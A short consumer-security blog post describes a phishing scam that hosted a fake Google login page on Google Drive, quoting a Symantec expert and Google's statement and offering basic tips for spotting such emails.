There is a new very tricky phishing scam taking advantage of Google Docs.  It has been working its way around the web.  It uses a Google.com URL and even uses a Google SSL encryption so it is very hard to tell it is a hack.

An email.  Getting an email that you don’t know who it is from is usually the way all these hackings start.  This one is the same.  It arrives in your inbox with a message showing a subject line “documents” and has a link to a good docs link.  It shows up in the address bar and looks just like the real Google.com domain.  However, it is taking you to a fake log-in page.  This is how it starts, and the hacker gets you.

In an article by Gizmodo, a Symantec security expert Nick Johnson explained, “The scammers have simply created a folder inside a Google Drive account, marked it as public, uploaded a file there, and then used Google Drive’s preview feature to get a publicly accessible URL to include in their messages.”  This fake page is actually hosted on Google’s serves and is served over SSL, making the page even more convincing.

After logging in to your Google account through the fake page, you will actually be taken to a real Google doc.  Now they have you and your information and it will be sent to PHP script on a compromised server.  You won’t even know you have been hacked. So in order to avoid this hacking situation there are two things that will help.  Use some common sense when clicking on and opening emails that you are unsure of.  If you receive an email from an unrecognized sender, don’t open it.  Or even someone you do know with the subject line “documents”  it is probably not safe.

If for some reason you do end up on the log-in screen, you should notice that it does not recognize you as a Google user.  If, in fact, you are a Google user.  That is likely a fake log in page.  If it seems strange that you need to log in again, it probably is. So, just be beware of all these hacking sceamers out there.  Try not to fall for them in the first place and all should be well and good.  These phishing scams are getting very sophisticated. Google has said that the problem is fixed and a statement form their press team says:

“We’ve removed the fake pages and our abuse team is working to prevent this kind of spoofing from happening again. If you think you may have accidentally given out your account information, please reset your password.”

Facebooktwitterredditpinterestlinkedinmail